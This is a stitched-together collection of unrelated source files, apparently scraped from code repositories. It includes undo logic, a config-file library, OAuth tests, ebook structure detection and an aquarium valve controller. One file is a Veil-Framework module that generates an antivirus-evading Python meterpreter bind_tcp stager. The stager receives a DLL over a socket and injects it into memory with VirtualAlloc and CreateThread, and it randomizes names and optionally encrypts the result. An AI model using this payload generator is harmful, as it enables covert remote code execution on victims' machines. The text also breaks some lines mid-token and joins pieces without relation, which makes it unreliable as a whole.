view.tree.SetFullState(self.state)
self.state = state
def redo(self):
self.undo()
Presenter.unselect()
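# Hedged sketch of the stack discipline used by UndoManager above: registering
# a new action pushes onto `undo`, trims it to undo_depth, and destroys `redo`,
# so history forks are discarded. E.g. after undoing B and then registering C,
# undo == [A, C] and redo == [] -- B is no longer reachable.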
Veil-Framework/Veil | tools/evasion/payloads/python/meterpreter/bind_tcp.py | Python | gpl-3.0 | 6,026 | 0.009459
"""
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketN
|
ame)
payload_code += "\t\t%s,_ = %s.acce
|
pt()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
kyclark/misc | tacc_manifest_upload/copy_from_manifest.py | Python | mit | 1,866 | 0.001608
#!/usr/bin/env python3
import os
import sys
import re
import tempfile
from subprocess import run
from shutil import copyfile
args = sys.argv[1:]
in_dir = args[0] if len(args) == 1 else os.getcwd()
if not os.path.isabs(in_dir):
in_dir = os.path.abspath(in_dir)
if not os.path.isdir(in_dir):
print('"{}" is not a directory'.format(in_dir))
sys.exit(1)
work_dir = os.environ['WORK']
app_dir = re.sub(work_dir, '', in_dir)
if app_dir.startswith('/'):
app_dir = app_dir[1:]
app_base = os.path.split(app_dir)[0]
print('Looking in "{}"'.format(in_dir))
manifests = []
for root, _, filenames in os.walk(in_dir):
for filename in filenames:
if filename == 'MANIFEST':
manifests.append(os.path.join(root, filename))
num = len(manifests)
print('Found {} MANIFEST file{} in "{}"'.format(num, '' if num == 1 else 's', in_dir))
if num == 0:
sys.exit(1)
file_num = 0
tmp_dir = os.path.join(tempfile.mkdtemp(), app_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
for manifest in manifests:
man_dir = os.path.dirname(manifest)
print('Processing {}'.format(manifest))
for file in open(manifest):
file = file.rstrip()
path = re.sub(r'^\.', man_dir, file)
file_num += 1
print('{:3}: {}'.format(file_num, path))
if os.path.isfile(path):
filedir = os.path.dirname(re.sub(in_dir, '', path))
if filedir.startswith('/'):
filedir = filedir[1:]
partial = os.path.join(tmp_dir, filedir)
if not os.path.isdir(partial):
os.makedirs(partial)
copyfile(path, os.path.join(partial, os.path.basename(file)))
dest = 'kyclark/applications/' + app_base
upload = '/home1/03137/kyclark/cyverse-cli/bin/files-upload'
run([upload, '-F', tmp_dir, dest])
print('Done, check "{}"'.format(dest))
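# Hedged example (paths hypothetical): a './...' MANIFEST entry is rewritten
# relative to the manifest's directory by the re.sub above, e.g.
# re.sub(r'^\.', '/work/app/run1', './reads/r1.fq') -> '/work/app/run1/reads/r1.fq'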
theguardian/JIRA-APPy | lib/configobj/configobj.py | Python | gpl-2.0 | 89,640 | 0.003614
# configobj.py
# A config file reader/writer that supports nested sections in config files.
# Copyright (C) 2005-2014:
# (name) : (email)
# Michael Foord: fuzzyman AT voidspace DOT org DOT uk
# Nicola Larosa: nico AT tekNico DOT net
# Rob Dennis: rdennis AT gmail DOT com
# Eli Courtwright: eli AT courtwright DOT org
# This software is licensed under the terms of the BSD license.
# http://opensource.org/licenses/BSD-3-Clause
# ConfigObj 5 - main repository for documentation and issue tracking:
# https://github.com/DiffSK/configobj
import os
import re
import sys
from codecs import BOM_UTF8, BOM_UTF16, BOM_UTF16_BE, BOM_UTF16_LE
from lib.six import six
from _version import __version__
# imported lazily to avoid startup performance hit if it isn't used
compiler = None
# A dictionary mapping BOM to
# the encoding to decode with, and what to set the
# encoding attribute to.
BOMS = {
BOM_UTF8: ('utf_8', None),
BOM_UTF16_BE: ('utf16_be', 'utf_16'),
BOM_UTF16_LE: ('utf16_le', 'utf_16'),
BOM_UTF16: ('utf_16', 'utf_16'),
}
# All legal variants of the BOM codecs.
# TODO: the list of aliases is not meant to be exhaustive, is there a
# better way ?
BOM_LIST = {
'utf_16': 'utf_16',
'u16': 'utf_16',
'utf16': 'utf_16',
'utf-16': 'utf_16',
'utf16_be': 'utf16_be',
'utf_16_be': 'utf16_be',
'utf-16be': 'utf16_be',
'utf16_le': 'utf16_le',
'utf_16_le': 'utf16_le',
'utf-16le': 'utf16_le',
'utf_8': 'utf_8',
'u8': 'utf_8',
'utf': 'utf_8',
'utf8': 'utf_8',
'utf-8': 'utf_8',
}
# Map of encodings to the BOM to write.
BOM_SET = {
'utf_8': BOM_UTF8,
'utf_16': BOM_UTF16,
'utf16_be': BOM_UTF16_BE,
'utf16_le': BOM_UTF16_LE,
None: BOM_UTF8
}
def match_utf8(encoding):
return BOM_LIST.get(encoding.lower()) == 'utf_8'
# Quote strings used for writing values
squot = "'%s'"
dquot = '"%s"'
noquot = "%s"
wspace_plus = ' \r\n\v\t\'"'
tsquot = '"""%s"""'
tdquot = "'''%s'''"
# Sentinel for use in getattr calls to replace hasattr
MISSING = object()
__all__ = (
'DEFAULT_INDENT_TYPE',
'DEFAULT_INTERPOLATION',
'ConfigObjError',
'NestingError',
'ParseError',
'DuplicateError',
'ConfigspecError',
'ConfigObj',
'SimpleVal',
'InterpolationError',
'InterpolationLoopError',
'MissingInterpolationOption',
'RepeatSectionError',
'ReloadError',
'UnreprError',
'UnknownType',
'flatten_errors',
'get_extra_values'
)
DEFAULT_INTERPOLATION = 'configparser'
DEFAULT_INDENT_TYPE = ' '
MAX_INTERPOL_DEPTH = 10
OPTION_DEFAULTS = {
'interpolation': True,
'raise_errors': False,
'list_values': True,
'create_empty': False,
'file_error': False,
'configspec': None,
'stringify': True,
# option may be set to one of ('', ' ', '\t')
'indent_type': None,
'encoding': None,
'default_encoding': None,
'unrepr': False,
'write_empty_values': False,
}
# this could be replaced if six is used for compatibility, or there are no
# more assertions about items being a string
def getObj(s):
global compiler
if compiler is None:
import compiler
s = "a=" + s
p = compiler.parse(s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
class UnknownType(Exception):
pass
class Builder(object):
def build(self, o):
m = getattr(self, 'build_' + o.__class__.__name__, None)
if m is None:
raise UnknownType(o.__class__.__name__)
return m(o)
def build_List(self, o):
return list(map(self.build, o.getChildren()))
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = next(i)
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
if o.name == 'None':
return None
if o.name == 'True':
return True
if o.name == 'False':
return False
# An undefined Name
raise UnknownType('Undefined Name')
def build_Add(self, o):
real, imag = list(map(self.build_Const, o.getChildren()))
try:
real = float(real)
except TypeError:
raise UnknownType('Add')
if not isinstance(imag, complex) or imag.real != 0.0:
raise UnknownType('Add')
return real+imag
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_UnarySub(self, o):
return -self.build_Const(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build_Const(o.getChildren()[0])
_builder = Builder()
def unrepr(s):
if not s:
return s
# this is supposed to be safe
import ast
return ast.literal_eval(s)
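# Hedged example: unrepr parses simple Python literals via ast.literal_eval,
# e.g. unrepr("['a', 1, {'b': 2}]") -> ['a', 1, {'b': 2}], and returns falsy
# input (such as '') unchanged.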
class ConfigObjError(SyntaxError):
"""
This is the base class for all errors that ConfigObj raises.
It is a subclass of SyntaxError.
"""
def __init__(self, message='', line_number=None, line=''):
self.line = line
self.line_number = line_number
SyntaxError.__init__(self, message)
class NestingError(ConfigObjError):
"""
This error indicates a level of nesting that doesn't match.
"""
class ParseError(ConfigObjError):
"""
This error indicates that a line is badly written.
It is neither a valid ``key = value`` line,
nor a valid section marker line.
"""
class ReloadError(IOError):
"""
A 'reload' operation failed.
This exception is a subclass of ``IOError``.
"""
def __init__(self):
IOError.__init__(self, 'reload failed, filename is not set.')
class DuplicateError(ConfigObjError):
"""
The keyword or section specified already exists.
"""
class ConfigspecError(ConfigObjError):
"""
An error occurred whilst parsing a configspec.
"""
class InterpolationError(ConfigObjError):
"""Base class for the two interpolation errors."""
class InterpolationLoopError(InterpolationError):
"""Maximum interpolation depth exceeded in string interpolation."""
def __init__(self, option):
InterpolationError.__init__(
self,
'interpolation loop detected in value "%s".' % option)
class RepeatSectionError(ConfigObjError):
"""
This error indicates additional sections in a section with a
``__many__`` (repeated) section.
"""
class MissingInterpolationOption(InterpolationError):
"""A value specified for interpolation was missing."""
def __init__(self, option):
msg = 'missing option "%s" in interpolation.' % option
InterpolationError.__init__(self, msg)
class UnreprError(ConfigObjError):
"""An error parsing in unrepr mode."""
class InterpolationEngine(object):
"""
A helper class to help perform string interpolation.
This class is an abstract base class; its descendants perform
the actual work.
"""
# compiled regexp to use in self.interpolate()
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
_cookie = '%'
def __init__(self, section):
# the Section instance that "owns" this engine
self.section = section
def interpolate(self, key, value):
# short-cut
if not self._cookie in value:
return value
def recursive_interpolate(key, value, section, backtrail):
"""The function that does the actual work.
``value``: the string we're trying to interpolate.
``section``: the section in which that string was found
``backtrail``: a dict to keep track of where we've been,
to detect and prevent infinite recursion loops
This is similar to a depth-first-search algorithm.
"""
# Have we been here already?
if (key, section.name) in backtrail:
# Yes - infinite loop detected
raise InterpolationLoopError(key)
# Place a marker on our backtrail so we won't come back here again
backtrail[(key, section.name)] = 1
daafgo/Server_LRS | lrs/tests/OAuthTests.py | Python | apache-2.0 | 161,641 | 0.009385
import uuid
import json
import urllib
import os
import base64
import time
import string
import random
import oauth2 as oauth
from Crypto.PublicKey import RSA
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from ..views import reg_client, register, statements
from ..models import Activity, Agent
from oauth_provider.models import Consumer, Token, Nonce
from oauth_provider.utils import SignatureMethod_RSA_SHA1
# Django client uses testserver
TEST_SERVER = 'http://testserver'
INITIATE_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/initiate"
AUTHORIZATION_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/authorize"
TOKEN_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/token"
class OAuthTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
if not settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = True
# Create a user
self.user = User.objects.create_user('jane', 'jane@example.com', 'toto')
self.client.login(username='jane', password='toto')
#Register a consumer
self.name = "test jane client"
self.desc = "test jane client desc"
form = {"name":self.name, "description":self.desc}
self.client.post(reverse(reg_client),form)
self.consumer = Consumer.objects.get(name=self.name)
self.name2jane = "test jane client2"
self.desc2jane = "test jane client desc2"
form2jane = {"name":self.name2jane, "description":self.desc2jane}
self.client.post(reverse(reg_client),form2jane)
self.consumer2jane = Consumer.objects.get(name=self.name2jane)
self.client.logout()
self.jane_auth = "Basic %s" % base64.b64encode("%s:%s" % ('jane','toto'))
# Create a user
self.user2 = User.objects.create_user('dick', 'dick@example.com', 'lassie')
self.client.login(username='dick', password='lassie')
#Register a client
self.name2 = "test client2"
self.desc2 = "test desc2"
form2 = {"name":self.name2, "description":self.desc2}
self.client.post(reverse(reg_client),form2)
self.consumer2 = Consumer.objects.get(name=self.name2)
self.client.logout()
self.dick_auth = "Basic %s" % base64.b64encode("%s:%s" % ('dick','lassie'))
def tearDown(self):
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
# Delete everything
Token.objects.all().delete()
Consumer.objects.all().delete()
Nonce.objects.all().delete()
User.objects.all().delete()
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_path, the_file)
try:
os.unlink(file_path)
except Exception, e:
raise e
def oauth_handshake(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce='', consumer=None):
# ============= INITIATE =============
if not request_nonce:
request_nonce = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
if not consumer:
consumer = self.consumer
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (consumer.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
# Set scope
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
# Add non oauth params in query string or form
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# Make oauth request depending on where the parameters are
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Send request depending on the parameters
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
# Get request token (will be only token for that user)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token_secret = request_resp.content.split('&')[0].split('=')[1]
request_token = Token.objects.get(secret=token_secret)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
# Try to hit auth path, made to login
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
# Post data back to auth endpoint - should redirect to callback_url we set
sharad/calibre | src/calibre/ebooks/oeb/transforms/structure.py | Python | gpl-3.0 | 13,406 | 0.00358
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import re, uuid
from lxml import etree
from urlparse import urlparse
from collections import OrderedDict, Counter
from calibre.ebooks.oeb.base import XPNSMAP, TOC, XHTML, xml2text, barename
from calibre.ebooks import ConversionError
def XPath(x):
try:
return etree.XPath(x, namespaces=XPNSMAP)
except etree.XPathSyntaxError:
raise ConversionError(
'The syntax of the XPath expression %s is invalid.' % repr(x))
def isspace(x):
return not x or x.replace(u'\xa0', u'').isspace()
def at_start(elem):
' Return True if there is no content before elem '
body = XPath('ancestor-or-self::h:body')(elem)
if not body:
return True
body = body[0]
ancestors = frozenset(XPath('ancestor::*')(elem))
for x in body.iter():
if x is elem:
return True
if hasattr(getattr(x, 'tag', None), 'rpartition') and x.tag.rpartition('}')[-1] in {'img', 'svg'}:
return False
if isspace(getattr(x, 'text', None)) and (x in ancestors or isspace(getattr(x, 'tail', None))):
continue
return False
return False
class DetectStructure(object):
def __call__(self, oeb, opts):
self.log = oeb.log
self.oeb = oeb
self.opts = opts
self.log('Detecting structure...')
self.detect_chapters()
if self.oeb.auto_generated_toc or opts.use_auto_toc:
orig_toc = self.oeb.toc
self.oeb.toc = TOC()
self.create_level_based_toc()
if self.oeb.toc.count() < 1:
if not opts.no_chapters_in_toc and self.detected_chapters:
self.create_toc_from_chapters()
if self.oeb.toc.count() < opts.toc_threshold:
self.create_toc_from_links()
if self.oeb.toc.count() < 2 and orig_toc.count() > 2:
self.oeb.toc = orig_toc
else:
self.oeb.auto_generated_toc = True
self.log('Auto generated TOC with %d entries.' %
self.oeb.toc.count())
if opts.toc_filter is not None:
regexp = re.compile(opts.toc_filter)
for node in list(self.oeb.toc.iter()):
if not node.title or regexp.search(node.title) is not None:
self.log('Filtering', node.title if node.title else
'empty node', 'from TOC')
self.oeb.toc.remove(node)
if opts.page_breaks_before is not None:
pb_xpath = XPath(opts.page_breaks_before)
for item in oeb.spine:
for elem in pb_xpath(item.data):
try:
prev = elem.itersiblings(tag=etree.Element,
preceding=True).next()
if (barename(elem.tag) in {'h1', 'h2'} and barename(
prev.tag) in {'h1', 'h2'} and (not prev.tail or
not prev.tail.split())):
# We have two adjacent headings, do not put a page
# break on the second one
continue
except StopIteration:
pass
style = elem.get('style', '')
if style:
style += '; '
elem.set('style', style+'page-break-before:always')
for node in self.oeb.toc.iter():
if not node.title or not node.title.strip():
node.title = _('Unnamed')
if self.opts.start_reading_at:
self.detect_start_reading()
def detect_start_reading(self):
expr = self.opts.start_reading_at
try:
expr = XPath(expr)
except:
self.log.warn(
'Invalid start reading at XPath expression, ignoring: %s'%expr)
return
for item in self.oeb.spine:
if not hasattr(item.data, 'xpath'):
continue
matches = expr(item.data)
if matches:
elem = matches[0]
eid = elem.get('id', None)
if not eid:
eid = u'start_reading_at_'+unicode(uuid.uuid4()).replace(u'-', u'')
elem.set('id', eid)
if u'text' in self.oeb.guide:
self.oeb.guide.remove(u'text')
self.oeb.guide.add(u'text', u'Start', item.href+u'#'+eid)
self.log('Setting start reading at position to %s in %s'%(
self.opts.start_reading_at, item.href))
return
self.log.warn("Failed to find start reading at position: %s"%
self.opts.start_reading_at)
def get_toc_parts_for_xpath(self, expr):
# if an attribute is selected by the xpath expr then truncate it
# from the path and instead return it as where to find the title text
title_attribute_regex = re.compile(r'/@([-\w]+)$')
match = title_attribute_regex.search(expr)
if match is not None:
return expr[0:match.start()], match.group(1)
return expr, None
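# Hedged example: '//h:h1/@title' splits into ('//h:h1', 'title'), so chapter
# titles are read from the attribute; '//h:h1' yields ('//h:h1', None) and the
# element text is used instead.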
def detect_chapters(self):
self.detected_chapters = []
self.chapter_title_attribute = None
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid chapter expression, ignoring: %s'%expr)
return []
if self.opts.chapter:
chapter_path, title_attribute = self.get_toc_parts_for_xpath(self.opts.chapter)
self.chapter_title_attribute = title_attribute
for item in self.oeb.spine:
for x in find_matches(chapter_path, item.data):
self.detected_chapters.append((item, x))
chapter_mark = self.opts.chapter_mark
page_break_before = 'display: block; page-break-before: always'
page_break_after = 'display: block; page-break-after: always'
c = Counter()
for item, elem in self.detected_chapters:
c[item] += 1
text = xml2text(elem).strip()
text = re.sub(r'\s+', ' ', text.strip())
self.log('\tDetected chapter:', text[:50])
if chapter_mark == 'none':
continue
if chapter_mark == 'rule':
mark = etree.Element(XHTML('hr'))
elif chapter_mark == 'pagebreak':
if c[item] < 3 and at_start(elem):
# For the first two elements in this item, check if they
# are at the start of the file, in which case inserting a
# page break is unnecessary and can lead to extra blank
# pages in the PDF Output plugin. We need to use two as
# feedbooks epubs match both a heading tag and its
# containing div with the default chapter expression.
continue
mark = etree.Element(XHTML('div'), style=page_break_after)
else: # chapter_mark == 'both':
mark = etree.Element(XHTML('hr'), style=page_break_before)
try:
elem.addprevious(mark)
except TypeError:
self.log.exception('Failed to mark chapter')
def create_level_based_toc(self):
if self.opts.level1_toc is not None:
self.add_leveled_toc_items()
def create_toc_from_chapters(self):
counter = self.oeb.toc.next_play_order()
for item, elem in self.detected_chapters:
text, href = self.elem_to_link(item, elem, self.chapter_title_attribute, counter)
self.oeb.toc.add(text, href, play_order=counter)
aquamonitor/Aquamonitor | rodi.py | Python | lgpl-3.0 | 4,109 | 0.011682
#!/usr/bin/python
import sys, signal, logging, time, subprocess, RPi.GPIO as GPIO
FLOATSW_HIGH_WL = 26 # high water level float switch
WATER_VALVE = 10 # GPIO port for the Water Electo valve, High by default after boot
VALVE_CHGSTATE_TIMER = 25 # Electro valve needs roughly 20 seconds to switch from open to close and vice versa
logger = None
def Setup():
global logger
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/var/log/rodi.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s',"%Y-%m-%d %H:%M:%S")
handler.setFormatter(formatter)
logger.addHandler(handler)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(WATER_VALVE, GPIO.OUT)
GPIO.setup(FLOATSW_HIGH_WL, GPIO.IN, pull_up_down=GPIO.PUD_UP) #, initial = GPIO.HIGH)
if not sys.stdout.isatty():
sys.stderr = open('/var/log/rodi_stderr.log', 'a')
sys.stdout = open('/var/log/rodi_stdout.log', 'a')
def Alert(message):
global logger
logger.info(message) # log the event
print(message)
logger.handlers[0].flush()
def Close_valve():
GPIO.output(WATER_VALVE, False)
Alert("Closing the RO/DI valve")
def Open_valve():
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened")
sys.exit(5)
else:
Alert("Opening the RO/DI valve")
GPIO.output(WATER_VALVE, True)
time.sleep(VALVE_CHGSTATE_TIMER)
def Refilling():
if GPIO.input(WATER_VALVE) == True:
return True
else:
return False
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
if not len(sys.argv) > 1:
print("You must provide one numerical argument to this function (duration in seconds). Exiting.")
sys.exit(1)
if sys.argv[1] != "close" and sys.argv[1] != "stop"
|
and not sys.argv[1].isdigit():
print("Value is neither 'close', 'stop' or a refill duration expressed in seconds")
sys.exit(1)
i = 0
killer = GracefulKiller()
Setup()
if sys.argv[1] == "close" or sys.argv[1] == "stop":
Close_valve()
if str.count(subprocess.check_output(["ps", "aux"]), "rodi") > 1:
Alert("Warning, we were called while another instance of rodi.py was already in Memory")
sys.exit(1)
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump already high, refilling would be dangerous, exiting")
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened while high water in the sump, closing.")
Close_valve()
sys.exit(3)
if sys.argv[1].isdigit():
Alert("Not already refilling, sump water level normal, proceeding.")
Alert("Refilling for " + sys.argv[1] + " seconds")
try:
Open_valve()
while i<VALVE_CHGSTATE_TIMER+int(sys.argv[1]):
time.sleep(1)
i=i+1
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump is now high, stopping the refill")
Close_valve()
sys.exit(3)
break
if killer.kill_now:
Alert("Caught a Sigterm, Sigkill or CTRL+C, exiting.")
Close_valve()
sys.exit(2)
break
Alert("Refill done, exiting.")
Close_valve()
sys.exit(0)
except (RuntimeError, IOError):
Alert("Caught an exception, exiting.")
Close_valve()
sys.exit(4)
# Exit code :
# 5 : already refilling or cannot create lock file
# 4 : Caught an exception
# 3 : water is high either at start or during the refill
# 2 : a sigkill, sigterm or keyboard CTRL+C signal was received
# 1 : incorrect parameter received
# 0 : all went fine
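# Hedged usage (GPIO wiring assumed as configured above):
# ./rodi.py 120 -> refill for 120 seconds unless the float switch trips
# ./rodi.py stop -> force the valve closed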
miketheman/opencomparison | profiles/templatetags/profile_tags.py | Python | mit | 137 | 0
from django import template
register = template.Library()
@register.filter
def package_usage(user):
return user.package_set.all()
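# Hedged usage sketch (template fragment illustrative):
# {% load profile_tags %}
# {{ request.user|package_usage }} renders the user's package queryset.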
mit-crpg/openmc | openmc/lib/filter.py | Python | mit | 16,055 | 0.000561
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
